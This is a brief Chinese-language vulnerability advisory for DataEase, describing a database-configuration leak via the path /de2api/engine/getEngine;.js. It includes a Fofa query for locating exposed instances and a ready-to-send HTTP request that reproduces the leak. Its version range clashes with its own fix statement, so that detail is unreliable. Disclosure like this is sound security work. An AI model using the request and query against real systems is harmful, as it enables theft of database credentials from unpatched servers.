0x01 产品描述:
DataEase(github.com/dataease)是一款开源的数据可视化分析工具,可以帮助用户快速分析业务数据并洞察其趋势,为企业的业务改进与优化提供支持。
0x02 漏洞描述:
DataEase在版本2.5.0之前存在数据库配置信息暴露漏洞。通过浏览器访问/de2api/engine/getEngine;.js路径可以获取平台的数据库配置。该漏洞已在v2.5.0中修复,除了升级之外,没有已知的解决方法。
0x03 影响版本:
DataEase <= 2.5.0版本
0x04 搜索语句:
Fofa:body="Dataease"
0x05 漏洞复现:
GET /de2api/engine/getEngine;.js HTTP/1.1
Content-Type: application/json
Host: your-ip
0x06 修复建议:
厂商已发布补丁,请更新至最新版